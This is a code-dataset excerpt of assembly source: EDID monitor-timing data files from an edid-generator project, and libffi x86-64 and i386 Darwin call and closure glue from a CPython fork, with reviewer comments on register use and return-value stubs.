Bits 3-0 Vertical display size, mm, 4 msbits */
dsp_size_mbsb: .byte msbs2(xsize,ysize)
/* Horizontal border pixels (each side; total is twice this) */
x_border: .byte 0
/* Vertical border lines (each side; total is twice this) */
y_border: .byte 0
/* Bit 7 Interlaced
Bits 6-5 Stereo mode: 00=No stereo; other values depend on bit 0:
Bit 0=0: 01=Field sequential, sync=1 during right; 10=similar,
sync=1 during left; 11=4-way interleaved stereo
Bit 0=1 2-way interleaved stereo: 01=Right image on even lines;
10=Left image on even lines; 11=side-by-side
Bits 4-3 Sync type: 00=Analog composite; 01=Bipolar analog composite;
10=Digital composite (on HSync); 11=Digital separate
Bit 2 If digital separate: Vertical sync polarity (1=positive)
Other types: VSync serrated (HSync during VSync)
Bit 1 If analog sync: Sync on all 3 RGB lines (else green only)
Digital: HSync polarity (1=positive)
Bit 0 2-way line-interleaved stereo, if bits 4-3 are not 00. */
features: .byte 0x18+(VSYNC_POL<<2)+(HSYNC_POL<<1) /* digital separate sync */
descriptor2: .byte 0,0 /* Not a detailed timing descriptor */
.byte 0 /* Must be zero */
.byte 0xff /* Descriptor is monitor serial number (text) */
.byte 0 /* Must be zero */
start1: .ascii "Linux #0"
end1: .byte 0x0a /* End marker */
.fill 12-(end1-start1), 1, 0x20 /* Padded spaces */
descriptor3: .byte 0,0 /* Not a detailed timing descriptor */
.byte 0 /* Must be zero */
.byte 0xfd /* Descriptor is monitor range limits */
.byte 0 /* Must be zero */
start2: .byte VFREQ-1 /* Minimum vertical field rate (1-255 Hz) */
.byte VFREQ+1 /* Maximum vertical field rate (1-255 Hz) */
.byte (CLOCK/(XPIX+XBLANK))-1 /* Minimum horizontal line rate
(1-255 kHz) */
.byte (CLOCK/(XPIX+XBLANK))+1 /* Maximum horizontal line rate
(1-255 kHz) */
.byte (CLOCK/10000)+1 /* Maximum pixel clock rate, rounded up
to 10 MHz multiple (10-2550 MHz) */
.byte 0 /* No extended timing information type */
end2: .byte 0x0a /* End marker */
.fill 12-(end2-start2), 1, 0x20 /* Padded spaces */
descriptor4: .byte 0,0 /* Not a detailed timing descriptor */
.byte 0 /* Must be zero */
.byte 0xfc /* Descriptor is text */
.byte 0 /* Must be zero */
start3: .ascii TIMING_NAME
end3: .byte 0x0a /* End marker */
.fill 12-(end3-start3), 1, 0x20 /* Padded spaces */
extensions: .byte 0 /* Number of extensions to follow */
/* NOTE(review): CRC is not defined in this file; presumably supplied by
   the build (e.g. -DCRC=<n> after a first assembly pass) — confirm. */
checksum: .byte CRC /* Sum of all bytes must be 0 */
|
akatrevorjay/edid-generator
| 1,317
|
1024x768.S
|
/*
1024x768.S: EDID data set for standard 1024x768 60 Hz monitor
Copyright (C) 2011 Carsten Emde <C.Emde@osadl.org>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
*/
/* EDID */
/* EDID structure version/revision advertised in the block (EDID 1.3). */
#define VERSION 1
#define REVISION 3
/* Display */
/* Detailed timing for 1024x768@60 ("Linux XGA"); pixel clock in kHz. */
#define CLOCK 65000 /* kHz */
#define XPIX 1024
#define YPIX 768
#define XY_RATIO XY_RATIO_4_3
#define XBLANK 320
#define YBLANK 38
#define XOFFSET 8
#define XPULSE 144
/* +63 bias: edid.S subtracts 63 when emitting the descriptor byte
   (see y_snc_lsb), so real vsync offset = 3 lines, pulse = 6 lines. */
#define YOFFSET (63+3)
#define YPULSE (63+6)
#define DPI 72
#define VFREQ 60 /* Hz */
#define TIMING_NAME "Linux XGA"
#define ESTABLISHED_TIMING2_BITS 0x08 /* Bit 3 -> 1024x768 @60 Hz */
/* Sync polarities: 0 = negative (consumed by the "features" byte in edid.S). */
#define HSYNC_POL 0
#define VSYNC_POL 0
#include "edid.S"
|
akatrevorjay/edid-generator
| 1,287
|
1920x1080.S
|
/*
1920x1080.S: EDID data set for standard 1920x1080 60 Hz monitor
Copyright (C) 2012 Carsten Emde <C.Emde@osadl.org>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
*/
/* EDID */
/* EDID structure version/revision advertised in the block (EDID 1.3). */
#define VERSION 1
#define REVISION 3
/* Display */
/* Detailed timing for 1920x1080@60 ("Linux FHD"); pixel clock in kHz. */
#define CLOCK 148500 /* kHz */
#define XPIX 1920
#define YPIX 1080
#define XY_RATIO XY_RATIO_16_9
#define XBLANK 280
#define YBLANK 45
#define XOFFSET 88
#define XPULSE 44
/* +63 bias: edid.S subtracts 63 when emitting the descriptor byte
   (see y_snc_lsb), so real vsync offset = 4 lines, pulse = 5 lines. */
#define YOFFSET (63+4)
#define YPULSE (63+5)
#define DPI 96
#define VFREQ 60 /* Hz */
#define TIMING_NAME "Linux FHD"
/* No ESTABLISHED_TIMINGx_BITS */
/* Sync polarities: 1 = positive (consumed by the "features" byte in edid.S). */
#define HSYNC_POL 1
#define VSYNC_POL 1
#include "edid.S"
|
akheron/cpython
| 11,660
|
Modules/_ctypes/libffi_osx/x86/darwin64.S
|
/* -----------------------------------------------------------------------
darwin64.S - Copyright (c) 2006 Free Software Foundation, Inc.
derived from unix64.S
x86-64 Foreign Function Interface for Darwin.
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
``Software''), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED ``AS IS'', WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR
OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
----------------------------------------------------------------------- */
#ifdef __x86_64__
#define LIBFFI_ASM
#include <fficonfig.h>
#include <ffi.h>
.file "darwin64.S"
.text
/* ffi_call_unix64 (void *args, unsigned long bytes, unsigned flags,
void *raddr, void (*fnaddr)());
Bit of trickiness here -- ARGS+BYTES is the base of the stack frame
for this function. This has been allocated by ffi_call. We also
deallocate some of the stack that has been alloca'd.
On entry (SysV AMD64): rdi=args (register/stack arg area), rsi=bytes,
rdx=flags, rcx=raddr (return-value buffer), r8=fnaddr, r9d=number of
SSE registers used (see the movl %r9d,%eax below). */
.align 3
.globl _ffi_call_unix64
_ffi_call_unix64:
LUW0:
movq (%rsp), %r10 /* Load return address. */
/* NOTE(review): %r12 is callee-saved in the SysV AMD64 ABI and is
   clobbered here without being preserved; the commented-out line at
   LUW1 suggests %r10 was originally used instead. Investigate before
   relying on %r12 surviving an ffi_call. */
movq %rdi, %r12 /* Save a copy of the register area. */
leaq (%rdi, %rsi), %rax /* Find local stack base. */
movq %rdx, (%rax) /* Save flags. */
movq %rcx, 8(%rax) /* Save raddr. */
movq %rbp, 16(%rax) /* Save old frame pointer. */
movq %r10, 24(%rax) /* Relocate return address. */
movq %rax, %rbp /* Finalize local stack frame. */
LUW1:
/* movq %rdi, %r10 // Save a copy of the register area. */
movq %r12, %r10
movq %r8, %r11 /* Save a copy of the target fn. */
movl %r9d, %eax /* Set number of SSE registers. */
/* Load up all argument registers. */
movq (%r10), %rdi
movq 8(%r10), %rsi
movq 16(%r10), %rdx
movq 24(%r10), %rcx
movq 32(%r10), %r8
movq 40(%r10), %r9
testl %eax, %eax /* Any SSE args at all? */
jnz Lload_sse /* If so, load xmm0-xmm7 from the area. */
Lret_from_load_sse:
/* Deallocate the reg arg area. */
leaq 176(%r10), %rsp
/* Call the user function. */
call *%r11
/* Deallocate stack arg area; local stack frame in redzone. */
leaq 24(%rbp), %rsp
movq 0(%rbp), %rcx /* Reload flags. */
movq 8(%rbp), %rdi /* Reload raddr. */
movq 16(%rbp), %rbp /* Reload old frame pointer. */
LUW2:
/* The first byte of the flags contains the FFI_TYPE.
   Dispatch through the pc-relative offset table below. */
movzbl %cl, %r10d
leaq Lstore_table(%rip), %r11
movslq (%r11, %r10, 4), %r10
addq %r11, %r10
jmp *%r10
/* Per-FFI_TYPE store stubs: each widens the raw return value and stores
   it through %rdi (raddr). Indexed by the pc-relative offset table. */
Lstore_table:
	.long	Lst_void-Lstore_table		/* FFI_TYPE_VOID */
	.long	Lst_sint32-Lstore_table		/* FFI_TYPE_INT */
	.long	Lst_float-Lstore_table		/* FFI_TYPE_FLOAT */
	.long	Lst_double-Lstore_table		/* FFI_TYPE_DOUBLE */
	.long	Lst_ldouble-Lstore_table	/* FFI_TYPE_LONGDOUBLE */
	.long	Lst_uint8-Lstore_table		/* FFI_TYPE_UINT8 */
	.long	Lst_sint8-Lstore_table		/* FFI_TYPE_SINT8 */
	.long	Lst_uint16-Lstore_table		/* FFI_TYPE_UINT16 */
	.long	Lst_sint16-Lstore_table		/* FFI_TYPE_SINT16 */
	.long	Lst_uint32-Lstore_table		/* FFI_TYPE_UINT32 */
	.long	Lst_sint32-Lstore_table		/* FFI_TYPE_SINT32 */
	.long	Lst_int64-Lstore_table		/* FFI_TYPE_UINT64 */
	.long	Lst_int64-Lstore_table		/* FFI_TYPE_SINT64 */
	.long	Lst_struct-Lstore_table		/* FFI_TYPE_STRUCT */
	.long	Lst_int64-Lstore_table		/* FFI_TYPE_POINTER */
	.text
	.align	3
Lst_void:
	ret
	.align	3
Lst_uint8:
	movzbq	%al, %rax			/* zero-extend u8 -> u64 */
	movq	%rax, (%rdi)
	ret
	.align	3
Lst_sint8:
	movsbq	%al, %rax			/* sign-extend s8 -> s64 */
	movq	%rax, (%rdi)
	ret
	.align	3
Lst_uint16:
	movzwq	%ax, %rax			/* zero-extend u16 -> u64 */
	movq	%rax, (%rdi)
	ret					/* BUGFIX: ret was missing, so control
						   fell through (across the align
						   padding) into Lst_sint16 and the
						   slot was re-stored sign-extended. */
	.align	3
Lst_sint16:
	movswq	%ax, %rax			/* sign-extend s16 -> s64 */
	movq	%rax, (%rdi)
	ret
	.align	3
Lst_uint32:
	movl	%eax, %eax			/* 32-bit mov zero-extends u32 -> u64 */
	movq	%rax, (%rdi)
	ret					/* BUGFIX: ret was missing, so control
						   fell through into Lst_sint32 and the
						   slot was re-stored sign-extended. */
	.align	3
Lst_sint32:
	cltq					/* sign-extend s32 -> s64 */
	movq	%rax, (%rdi)
	ret
	.align	3
Lst_int64:
	movq	%rax, (%rdi)
	ret
	.align	3
Lst_float:
	movss	%xmm0, (%rdi)
	ret
	.align	3
Lst_double:
	movsd	%xmm0, (%rdi)
	ret
	.align	3				/* keep this stub aligned like the rest */
Lst_ldouble:
	fstpt	(%rdi)
	ret
	.align	3
Lst_struct:
	leaq	-20(%rsp), %rsi			/* Scratch area in redzone. */
	/* We have to locate the values now, and since we don't want to
	   write too much data into the user's return value, we spill the
	   value to a 16 byte scratch area first. Bits 8, 9, and 10
	   control where the values are located. Only one of the three
	   bits will be set; see ffi_prep_cif_machdep for the pattern. */
	movd	%xmm0, %r10
	movd	%xmm1, %r11
	testl	$0x100, %ecx
	cmovnz	%rax, %rdx
	cmovnz	%r10, %rax
	testl	$0x200, %ecx
	cmovnz	%r10, %rdx
	testl	$0x400, %ecx
	cmovnz	%r10, %rax
	cmovnz	%r11, %rdx
	movq	%rax, (%rsi)
	movq	%rdx, 8(%rsi)
	/* Bits 12-31 contain the true size of the structure. Copy from
	   the scratch area to the true destination. */
	shrl	$12, %ecx
	rep movsb
	ret
/* Many times we can avoid loading any SSE registers at all.
It's not worth an indirect jump to load the exact set of
SSE registers needed; zero or all is a good compromise.
Register-area layout implied by the offsets: GP args at 0..40,
xmm args in 16-byte slots at 48..160 (movdqa requires the area
to be 16-byte aligned). */
.align 3
LUW3:
Lload_sse:
movdqa 48(%r10), %xmm0
movdqa 64(%r10), %xmm1
movdqa 80(%r10), %xmm2
movdqa 96(%r10), %xmm3
movdqa 112(%r10), %xmm4
movdqa 128(%r10), %xmm5
movdqa 144(%r10), %xmm6
movdqa 160(%r10), %xmm7
jmp Lret_from_load_sse
LUW4:
.align 3
.globl _ffi_closure_unix64
_ffi_closure_unix64:
LUW5:
/* The carry flag is set by the trampoline iff SSE registers
are used. Don't clobber it before the branch instruction.
NOTE(review): the closure pointer appears to arrive in %r10
(it is passed to the inner function below) — presumably set by
the trampoline; confirm against ffi_prep_closure. */
leaq -200(%rsp), %rsp /* 200-byte frame: GP regs 0..40, xmm 48..160 */
LUW6:
movq %rdi, (%rsp)
movq %rsi, 8(%rsp)
movq %rdx, 16(%rsp)
movq %rcx, 24(%rsp)
movq %r8, 32(%rsp)
movq %r9, 40(%rsp)
jc Lsave_sse
Lret_from_save_sse:
movq %r10, %rdi /* arg0: closure */
leaq 176(%rsp), %rsi /* arg1: area past the 176-byte reg save */
movq %rsp, %rdx /* arg2: saved register area */
leaq 208(%rsp), %rcx /* arg3: caller stack args (200 frame + 8 ret) */
call _ffi_closure_unix64_inner
/* Deallocate stack frame early; return value is now in redzone. */
addq $200, %rsp
LUW7:
/* The first byte of the return value contains the FFI_TYPE.
   Dispatch through the pc-relative offset table below. */
movzbl %al, %r10d
leaq Lload_table(%rip), %r11
movslq (%r11, %r10, 4), %r10
addq %r11, %r10
jmp *%r10
Lload_table:
.long Lld_void-Lload_table /* FFI_TYPE_VOID */
.long Lld_int32-Lload_table /* FFI_TYPE_INT */
.long Lld_float-Lload_table /* FFI_TYPE_FLOAT */
.long Lld_double-Lload_table /* FFI_TYPE_DOUBLE */
.long Lld_ldouble-Lload_table /* FFI_TYPE_LONGDOUBLE */
.long Lld_int8-Lload_table /* FFI_TYPE_UINT8 */
.long Lld_int8-Lload_table /* FFI_TYPE_SINT8 */
.long Lld_int16-Lload_table /* FFI_TYPE_UINT16 */
.long Lld_int16-Lload_table /* FFI_TYPE_SINT16 */
.long Lld_int32-Lload_table /* FFI_TYPE_UINT32 */
.long Lld_int32-Lload_table /* FFI_TYPE_SINT32 */
.long Lld_int64-Lload_table /* FFI_TYPE_UINT64 */
.long Lld_int64-Lload_table /* FFI_TYPE_SINT64 */
.long Lld_struct-Lload_table /* FFI_TYPE_STRUCT */
.long Lld_int64-Lload_table /* FFI_TYPE_POINTER */
.text
.align 3
Lld_void:
ret
.align 3
Lld_int8:
movzbl -24(%rsp), %eax /* reload result from the (redzone) frame */
ret
.align 3
Lld_int16:
movzwl -24(%rsp), %eax
ret
.align 3
Lld_int32:
movl -24(%rsp), %eax
ret
.align 3
Lld_int64:
movq -24(%rsp), %rax
ret
.align 3
Lld_float:
movss -24(%rsp), %xmm0
ret
.align 3
Lld_double:
movsd -24(%rsp), %xmm0
ret
.align 3
Lld_ldouble:
fldt -24(%rsp)
ret
.align 3
Lld_struct:
/* There are four possibilities here, %rax/%rdx, %xmm0/%rax,
%rax/%xmm0, %xmm0/%xmm1. We collapse two by always loading
both rdx and xmm1 with the second word. For the remaining,
bit 8 set means xmm0 gets the second word, and bit 9 means
that rax gets the second word. */
movq -24(%rsp), %rcx
movq -16(%rsp), %rdx
movq -16(%rsp), %xmm1
testl $0x100, %eax
cmovnz %rdx, %rcx
movd %rcx, %xmm0
testl $0x200, %eax
movq -24(%rsp), %rax
cmovnz %rdx, %rax
ret
/* See the comment above Lload_sse; the same logic applies here. */
.align 3
LUW8:
Lsave_sse:
movdqa %xmm0, 48(%rsp)
movdqa %xmm1, 64(%rsp)
movdqa %xmm2, 80(%rsp)
movdqa %xmm3, 96(%rsp)
movdqa %xmm4, 112(%rsp)
movdqa %xmm5, 128(%rsp)
movdqa %xmm6, 144(%rsp)
movdqa %xmm7, 160(%rsp)
jmp Lret_from_save_sse
LUW9:
/* Hand-coded DWARF call-frame information (CFI) for the two entry
   points above, emitted into the Mach-O coalesced __eh_frame section
   so the unwinder can step through ffi frames. */
.section __TEXT,__eh_frame,coalesced,no_toc+strip_static_syms+live_support
EH_frame1:
.set L$set$0,LECIE1-LSCIE1 /* CIE Length */
.long L$set$0
LSCIE1:
.long 0x0 /* CIE Identifier Tag */
.byte 0x1 /* CIE Version */
.ascii "zR\0" /* CIE Augmentation */
.byte 0x1 /* uleb128 0x1; CIE Code Alignment Factor */
.byte 0x78 /* sleb128 -8; CIE Data Alignment Factor */
.byte 0x10 /* CIE RA Column */
.byte 0x1 /* uleb128 0x1; Augmentation size */
.byte 0x10 /* FDE Encoding (pcrel sdata4) */
.byte 0xc /* DW_CFA_def_cfa, %rsp offset 8 */
.byte 0x7 /* uleb128 0x7 */
.byte 0x8 /* uleb128 0x8 */
.byte 0x90 /* DW_CFA_offset, column 0x10 */
.byte 0x1
.align 3
LECIE1:
.globl _ffi_call_unix64.eh
_ffi_call_unix64.eh:
LSFDE1:
.set L$set$1,LEFDE1-LASFDE1 /* FDE Length */
.long L$set$1
LASFDE1:
.long LASFDE1-EH_frame1 /* FDE CIE offset */
.quad LUW0-. /* FDE initial location */
.set L$set$2,LUW4-LUW0 /* FDE address range */
.quad L$set$2
.byte 0x0 /* Augmentation size */
.byte 0x4 /* DW_CFA_advance_loc4 */
.set L$set$3,LUW1-LUW0
.long L$set$3
/* New stack frame based off rbp. This is an itty bit of unwind
trickery in that the CFA *has* changed. There is no easy way
to describe it correctly on entry to the function. Fortunately,
it doesn't matter too much since at all points we can correctly
unwind back to ffi_call. Note that the location to which we
moved the return address is (the new) CFA-8, so from the
perspective of the unwind info, it hasn't moved. */
.byte 0xc /* DW_CFA_def_cfa, %rbp offset 32 */
.byte 0x6
.byte 0x20
.byte 0x80+6 /* DW_CFA_offset, %rbp offset 2*-8 */
.byte 0x2
.byte 0xa /* DW_CFA_remember_state */
.byte 0x4 /* DW_CFA_advance_loc4 */
.set L$set$4,LUW2-LUW1
.long L$set$4
.byte 0xc /* DW_CFA_def_cfa, %rsp offset 8 */
.byte 0x7
.byte 0x8
.byte 0xc0+6 /* DW_CFA_restore, %rbp */
.byte 0x4 /* DW_CFA_advance_loc4 */
.set L$set$5,LUW3-LUW2
.long L$set$5
.byte 0xb /* DW_CFA_restore_state */
.align 3
LEFDE1:
.globl _ffi_closure_unix64.eh
_ffi_closure_unix64.eh:
LSFDE3:
.set L$set$6,LEFDE3-LASFDE3 /* FDE Length */
.long L$set$6
LASFDE3:
.long LASFDE3-EH_frame1 /* FDE CIE offset */
.quad LUW5-. /* FDE initial location */
.set L$set$7,LUW9-LUW5 /* FDE address range */
.quad L$set$7
.byte 0x0 /* Augmentation size */
.byte 0x4 /* DW_CFA_advance_loc4 */
.set L$set$8,LUW6-LUW5
.long L$set$8
.byte 0xe /* DW_CFA_def_cfa_offset */
.byte 208,1 /* uleb128 208 */
.byte 0xa /* DW_CFA_remember_state */
.byte 0x4 /* DW_CFA_advance_loc4 */
.set L$set$9,LUW7-LUW6
.long L$set$9
.byte 0xe /* DW_CFA_def_cfa_offset */
.byte 0x8
.byte 0x4 /* DW_CFA_advance_loc4 */
.set L$set$10,LUW8-LUW7
.long L$set$10
.byte 0xb /* DW_CFA_restore_state */
.align 3
LEFDE3:
.subsections_via_symbols
#endif /* __x86_64__ */
|
akheron/cpython
| 8,955
|
Modules/_ctypes/libffi_osx/x86/x86-darwin.S
|
#ifdef __i386__
/* -----------------------------------------------------------------------
darwin.S - Copyright (c) 1996, 1998, 2001, 2002, 2003 Red Hat, Inc.
X86 Foreign Function Interface
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
``Software''), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED ``AS IS'', WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL CYGNUS SOLUTIONS BE LIABLE FOR ANY CLAIM, DAMAGES OR
OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
----------------------------------------------------------------------- */
/*
* This file is based on sysv.S and then hacked up by Ronald who hasn't done
* assembly programming in 8 years.
*/
#ifndef __x86_64__
#define LIBFFI_ASM
#include <fficonfig.h>
#include <ffi.h>
#ifdef PyObjC_STRICT_DEBUGGING
/* XXX: Debugging of stack alignment, to be removed */
#define ASSERT_STACK_ALIGNED movdqa -16(%esp), %xmm0
#else
#define ASSERT_STACK_ALIGNED
#endif
.text
.globl _ffi_prep_args
.align 4
.globl _ffi_call_SYSV
/* ffi_call_SYSV: i386 Darwin call glue.
   NOTE(review): argument layout inferred from the frame offsets used
   below — 8(%ebp)=prep_args fn, 12(%ebp)=extended cif, 16(%ebp)=arg
   bytes, 20(%ebp)=flags/return-type code, 24(%ebp)=rvalue pointer,
   28(%ebp)=target fn — confirm against the C caller in ffi.c. */
_ffi_call_SYSV:
LFB1:
pushl %ebp
LCFI0:
movl %esp,%ebp
LCFI1:
subl $8,%esp
/* Make room for all of the new args. */
movl 16(%ebp),%ecx
subl %ecx,%esp
movl %esp,%eax
/* Place all of the ffi_prep_args in position */
subl $8,%esp
pushl 12(%ebp)
pushl %eax
call *8(%ebp)
/* Return stack to previous state and call the function */
addl $16,%esp
call *28(%ebp)
/* Remove the space we pushed for the args */
movl 16(%ebp),%ecx
addl %ecx,%esp
/* Load %ecx with the return type code */
movl 20(%ebp),%ecx
/* If the return value pointer is NULL, assume no return value. */
cmpl $0,24(%ebp)
jne Lretint
/* Even if there is no space for the return value, we are
obliged to handle floating-point values. */
cmpl $FFI_TYPE_FLOAT,%ecx
jne Lnoretval
fstp %st(0) /* pop the x87 result so the FP stack stays balanced */
jmp Lepilogue
Lretint:
cmpl $FFI_TYPE_INT,%ecx
jne Lretfloat
/* Load %ecx with the pointer to storage for the return value */
movl 24(%ebp),%ecx
movl %eax,0(%ecx)
jmp Lepilogue
Lretfloat:
cmpl $FFI_TYPE_FLOAT,%ecx
jne Lretdouble
/* Load %ecx with the pointer to storage for the return value */
movl 24(%ebp),%ecx
fstps (%ecx)
jmp Lepilogue
Lretdouble:
cmpl $FFI_TYPE_DOUBLE,%ecx
jne Lretlongdouble
/* Load %ecx with the pointer to storage for the return value */
movl 24(%ebp),%ecx
fstpl (%ecx)
jmp Lepilogue
Lretlongdouble:
cmpl $FFI_TYPE_LONGDOUBLE,%ecx
jne Lretint64
/* Load %ecx with the pointer to storage for the return value */
movl 24(%ebp),%ecx
fstpt (%ecx)
jmp Lepilogue
Lretint64:
cmpl $FFI_TYPE_SINT64,%ecx
jne Lretstruct1b
/* Load %ecx with the pointer to storage for the return value */
movl 24(%ebp),%ecx
movl %eax,0(%ecx)
movl %edx,4(%ecx)
jmp Lepilogue
Lretstruct1b:
cmpl $FFI_TYPE_SINT8,%ecx
jne Lretstruct2b
/* Load %ecx with the pointer to storage for the return value */
movl 24(%ebp),%ecx
movb %al,0(%ecx)
jmp Lepilogue
Lretstruct2b:
cmpl $FFI_TYPE_SINT16,%ecx
jne Lretstruct
/* Load %ecx with the pointer to storage for the return value */
movl 24(%ebp),%ecx
movw %ax,0(%ecx)
jmp Lepilogue
Lretstruct:
cmpl $FFI_TYPE_STRUCT,%ecx
jne Lnoretval
/* Nothing to do!
NOTE(review): the addl $4 below assumes the callee returned with
"ret $4" (callee pops the hidden struct-return pointer), which left
%esp 4 bytes high relative to the other paths; after compensating,
%esp points at the saved %ebp — confirm this matches the Darwin
struct-return convention used by the callees. */
addl $4,%esp
popl %ebp
ret
Lnoretval:
Lepilogue:
addl $8,%esp /* redundant: the movl below resets %esp from %ebp anyway */
movl %ebp,%esp
popl %ebp
ret
LFE1:
.ffi_call_SYSV_end:
.align 4
FFI_HIDDEN (ffi_closure_SYSV)
.globl _ffi_closure_SYSV
/* Closure entry: dispatches into ffi_closure_SYSV_inner and then
   reloads the return value (written through "resp") into the
   registers the i386 ABI expects for the returned FFI_TYPE. */
_ffi_closure_SYSV:
LFB2:
pushl %ebp
LCFI2:
movl %esp, %ebp
LCFI3:
subl $56, %esp
leal -40(%ebp), %edx
movl %edx, -12(%ebp) /* resp */
leal 8(%ebp), %edx
movl %edx, 4(%esp) /* args = __builtin_dwarf_cfa () */
leal -12(%ebp), %edx
movl %edx, (%esp) /* &resp */
movl %ebx, 8(%esp) /* preserve callee-saved %ebx across the call */
LCFI7:
call L_ffi_closure_SYSV_inner$stub
movl 8(%esp), %ebx /* restore %ebx */
movl -12(%ebp), %ecx /* %ecx = resp (where the result was stored) */
cmpl $FFI_TYPE_INT, %eax
je Lcls_retint
cmpl $FFI_TYPE_FLOAT, %eax
je Lcls_retfloat
cmpl $FFI_TYPE_DOUBLE, %eax
je Lcls_retdouble
cmpl $FFI_TYPE_LONGDOUBLE, %eax
je Lcls_retldouble
cmpl $FFI_TYPE_SINT64, %eax
je Lcls_retllong
cmpl $FFI_TYPE_UINT8, %eax
je Lcls_retstruct1
cmpl $FFI_TYPE_SINT8, %eax
je Lcls_retstruct1
cmpl $FFI_TYPE_UINT16, %eax
je Lcls_retstruct2
cmpl $FFI_TYPE_SINT16, %eax
je Lcls_retstruct2
cmpl $FFI_TYPE_STRUCT, %eax
je Lcls_retstruct
Lcls_epilogue:
movl %ebp, %esp
popl %ebp
ret
Lcls_retint:
movl (%ecx), %eax
jmp Lcls_epilogue
Lcls_retfloat:
flds (%ecx)
jmp Lcls_epilogue
Lcls_retdouble:
fldl (%ecx)
jmp Lcls_epilogue
Lcls_retldouble:
fldt (%ecx)
jmp Lcls_epilogue
Lcls_retllong:
movl (%ecx), %eax
movl 4(%ecx), %edx
jmp Lcls_epilogue
Lcls_retstruct1:
movsbl (%ecx), %eax
jmp Lcls_epilogue
Lcls_retstruct2:
movswl (%ecx), %eax
jmp Lcls_epilogue
Lcls_retstruct:
lea -8(%ebp),%esp /* dead: immediately overwritten by the next movl */
movl %ebp, %esp
popl %ebp
ret $4 /* struct return: pop the caller-pushed hidden pointer */
LFE2:
#if !FFI_NO_RAW_API
/* Offsets into the raw-closure object; fields follow the inline
   trampoline, padded to 4-byte alignment. */
#define RAW_CLOSURE_CIF_OFFSET ((FFI_TRAMPOLINE_SIZE + 3) & ~3)
#define RAW_CLOSURE_FUN_OFFSET (RAW_CLOSURE_CIF_OFFSET + 4)
#define RAW_CLOSURE_USER_DATA_OFFSET (RAW_CLOSURE_FUN_OFFSET + 4)
#define CIF_FLAGS_OFFSET 20
.align 4
FFI_HIDDEN (ffi_closure_raw_SYSV)
.globl _ffi_closure_raw_SYSV
/* Raw closure entry.
   NOTE(review): %eax appears to hold the closure pointer on entry
   (all closure fields are addressed off %eax) — presumably loaded by
   the trampoline; confirm against ffi_prep_raw_closure. */
_ffi_closure_raw_SYSV:
LFB3:
pushl %ebp
LCFI4:
movl %esp, %ebp
LCFI5:
pushl %esi
LCFI6:
subl $36, %esp
movl RAW_CLOSURE_CIF_OFFSET(%eax), %esi /* closure->cif */
movl RAW_CLOSURE_USER_DATA_OFFSET(%eax), %edx /* closure->user_data */
movl %edx, 12(%esp) /* user_data */
leal 8(%ebp), %edx /* __builtin_dwarf_cfa () */
movl %edx, 8(%esp) /* raw_args */
leal -24(%ebp), %edx
movl %edx, 4(%esp) /* &res */
movl %esi, (%esp) /* cif */
call *RAW_CLOSURE_FUN_OFFSET(%eax) /* closure->fun */
movl CIF_FLAGS_OFFSET(%esi), %eax /* rtype */
cmpl $FFI_TYPE_INT, %eax
je Lrcls_retint
cmpl $FFI_TYPE_FLOAT, %eax
je Lrcls_retfloat
cmpl $FFI_TYPE_DOUBLE, %eax
je Lrcls_retdouble
cmpl $FFI_TYPE_LONGDOUBLE, %eax
je Lrcls_retldouble
cmpl $FFI_TYPE_SINT64, %eax
je Lrcls_retllong
Lrcls_epilogue:
addl $36, %esp
popl %esi
popl %ebp
ret
Lrcls_retint:
movl -24(%ebp), %eax
jmp Lrcls_epilogue
Lrcls_retfloat:
flds -24(%ebp)
jmp Lrcls_epilogue
Lrcls_retdouble:
fldl -24(%ebp)
jmp Lrcls_epilogue
Lrcls_retldouble:
fldt -24(%ebp)
jmp Lrcls_epilogue
Lrcls_retllong:
movl -24(%ebp), %eax
movl -20(%ebp), %edx
jmp Lrcls_epilogue
LFE3:
#endif
/* Lazy-binding stub for ffi_closure_SYSV_inner; the hlt bytes are
   placeholders that dyld rewrites (section is self_modifying_code). */
.section __IMPORT,__jump_table,symbol_stubs,self_modifying_code+pure_instructions,5
L_ffi_closure_SYSV_inner$stub:
